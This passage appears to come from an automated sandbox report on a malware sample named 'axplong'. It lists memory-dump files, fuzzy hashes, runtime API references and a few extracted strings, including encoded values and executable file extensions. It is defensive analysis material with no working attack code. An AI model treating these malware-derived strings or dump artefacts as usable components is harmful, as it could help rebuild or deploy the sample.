                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 32afcbb1caeca1241a083bbb673990f9ffabc3b984d1a8e8509ae5ef3e852d06
                                                                                                                                                                            • Instruction ID: e98d17513eac74135051be7ec1f5200c507a1a7f0556e08e45ac98667ef04463
                                                                                                                                                                            • Opcode Fuzzy Hash: 32afcbb1caeca1241a083bbb673990f9ffabc3b984d1a8e8509ae5ef3e852d06
                                                                                                                                                                            • Instruction Fuzzy Hash: D2B16031625605DFDB19CF28C48AB697BE0FF45364F258658E8E9CF2A1C335EA91CB40
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2cccb7faab0332c93042fe1326ead518b02bf7763dcaf33be24b8370032a3d9b
                                                                                                                                                                            • Instruction ID: 260146dd3a4932d47e2d7bd5bb9b2d731e19baf18a0f0cbdb7e78c4bf6d77cfb
                                                                                                                                                                            • Opcode Fuzzy Hash: 2cccb7faab0332c93042fe1326ead518b02bf7763dcaf33be24b8370032a3d9b
                                                                                                                                                                            • Instruction Fuzzy Hash: 1051E67060C7928FC319CF2D851563AFFE1AFC6205F084A9EE5D687282D774D648CB92
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 65efa34c583afadc3ee55c316ad0b965dfe386c9d5ba8b2be3414e5d5108f9c9
                                                                                                                                                                            • Instruction ID: 299da5e2b213f4d825c35951f01a2571b9eac593720951bbf33f88266b5cb4f9
                                                                                                                                                                            • Opcode Fuzzy Hash: 65efa34c583afadc3ee55c316ad0b965dfe386c9d5ba8b2be3414e5d5108f9c9
                                                                                                                                                                            • Instruction Fuzzy Hash: DA21B673F204394B7B0CC47E8C5737DB6E1C78C541745423AE8A6EA2C1D968D917E2E4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 39614054955814493fa1a0856cecedc13f279a7d3e9479b32ea2e7087ea1027d
                                                                                                                                                                            • Instruction ID: 0b4756de21194cdcd470f68d83dc0a7552e2f67a61a854274e0838ed1d106435
                                                                                                                                                                            • Opcode Fuzzy Hash: 39614054955814493fa1a0856cecedc13f279a7d3e9479b32ea2e7087ea1027d
                                                                                                                                                                            • Instruction Fuzzy Hash: FD117723F30C255A675C816D8C1727AA5D2EBD825071F533AD826E7284E9A4DE23D290
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                            • Instruction ID: d4ea4f4eac8514d748f96a6b78881cf0900f662dca857b3492711a6f35733df2
                                                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                            • Instruction Fuzzy Hash: A611087B20014147DE048AADD9FC5B6A796EBC7721B3D437AF0624B758DA22DA4DD900
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5c7674760ed0755b036bc1e799b3c8b2aba6b35fcc5ca966f170227408aca583
                                                                                                                                                                            • Instruction ID: 9d39df0189b7f8c68e0d0d2f152c81fdc1e6457f8ce30fe84bf50757d87e88da
                                                                                                                                                                            • Opcode Fuzzy Hash: 5c7674760ed0755b036bc1e799b3c8b2aba6b35fcc5ca966f170227408aca583
                                                                                                                                                                            • Instruction Fuzzy Hash: C4E0EC30641A48ABCF25BB14D91994C3B6AEB95358F548424FC144A232CBA6ED82DB95
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                            • Instruction ID: 7ea6801bec71ae29f30139dedf6e0e4199e820541da59902c5e07cfbe7eb1261
                                                                                                                                                                            • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                            • Instruction Fuzzy Hash: 6DE04632A11228EBCB15EB88890898AF2ACEB48B04F154096B501D3240C270DF00D7D4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                            • API String ID: 0-2390467879
                                                                                                                                                                            • Opcode ID: 72b56f1e250ecfee12eb4d5b439ba0e7226ae23fcbb8c4f194ec545fcc07354c
                                                                                                                                                                            • Instruction ID: d6f88e5823b8283abd42b9e8c38c338cae139d4f6bf38397a4e009a623df53d0
                                                                                                                                                                            • Opcode Fuzzy Hash: 72b56f1e250ecfee12eb4d5b439ba0e7226ae23fcbb8c4f194ec545fcc07354c
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B02C470A00248DFEF24EFA8C895BDEBBB5EF05304F504558E805A72C2D7759B85DBA2
                                                                                                                                                                            APIs
                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C847A7
                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00C847AF
                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C84838
                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00C84863
                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C848B8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                            • Opcode ID: 4db6d23cafede7d3d7b5aa208fe7352ac98d3e78a058f4c3dcbe6becf23a73e5
                                                                                                                                                                            • Instruction ID: c2aa04c19f3a5019a0db1b6bd364bc283ae9c48e1838d5393ce3b2fc28a857cb
                                                                                                                                                                            • Opcode Fuzzy Hash: 4db6d23cafede7d3d7b5aa208fe7352ac98d3e78a058f4c3dcbe6becf23a73e5
                                                                                                                                                                            • Instruction Fuzzy Hash: 1C51E734A0025A9BCF18FF68C885AAE7BB6AF4531CF148155E814DB392D732DF45CB94
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                            • API String ID: 0-3064271455
                                                                                                                                                                            • Opcode ID: fb291b60424aef093aaed9e97e79e51f820edf29b6ecdd35a667ba53fc05e43e
                                                                                                                                                                            • Instruction ID: 7ad9b353863c758b32bdd336edf88da0c6f004f009a2562f8e945dcb6e333cdc
                                                                                                                                                                            • Opcode Fuzzy Hash: fb291b60424aef093aaed9e97e79e51f820edf29b6ecdd35a667ba53fc05e43e
                                                                                                                                                                            • Instruction Fuzzy Hash: 005192B0904A0ACFDF029F59D88C1BDBFB4FF45318F114245D990A7264CB758A26DF58
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcsrchr
                                                                                                                                                                            • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                            • API String ID: 1752292252-4019086052
                                                                                                                                                                            • Opcode ID: 2da8c38d188ad9263086ce9caed7406564f8f93d37bd800e4cde2d371b7ad9dc
                                                                                                                                                                            • Instruction ID: 5658a4615610eb7d182a0c8f57b63c6f9c131ff450d39f5ed522be32273f635a
                                                                                                                                                                            • Opcode Fuzzy Hash: 2da8c38d188ad9263086ce9caed7406564f8f93d37bd800e4cde2d371b7ad9dc
                                                                                                                                                                            • Instruction Fuzzy Hash: 5601C82761862726661874199C0263F17989B83BBC735022AF958F77C1FE84DD425398
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
